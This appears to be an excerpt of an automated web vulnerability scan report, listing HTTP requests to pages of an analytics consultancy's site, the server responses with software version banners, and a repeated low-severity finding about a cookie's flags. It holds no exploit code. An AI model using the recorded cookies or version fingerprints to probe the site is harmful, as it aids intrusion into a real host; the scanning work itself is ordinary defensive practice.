GET /products/65-ae/110-analytics-engine.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:31 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:34 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31021
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/analytics-data-warehouse.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:21:52 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:21:54 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:21:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:28:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:28:32 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:28:32 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/64-campaign-tracker.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 00:31:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:31:04 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:31:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20595
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/90-analytics-toolbar.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:35 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:35 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28924
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/campaign-url-builder.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:27:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:27:25 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:27:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/dimensionator-analytics-toolbar.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:28:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:28:13 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:28:13 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27818
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:28:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:28:21 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:28:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18924
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:00:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:00:05 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:00:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:33:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:33:21 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:33:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/10-lunametrics-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:40:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:40:21 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:40:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:41:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:41:46 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:41:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/14-pure-visibility.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:43:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:43:45 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:43:45 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:41:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:41:17 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:41:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/16-vki-studios-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:59:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:59:16 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:59:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23392
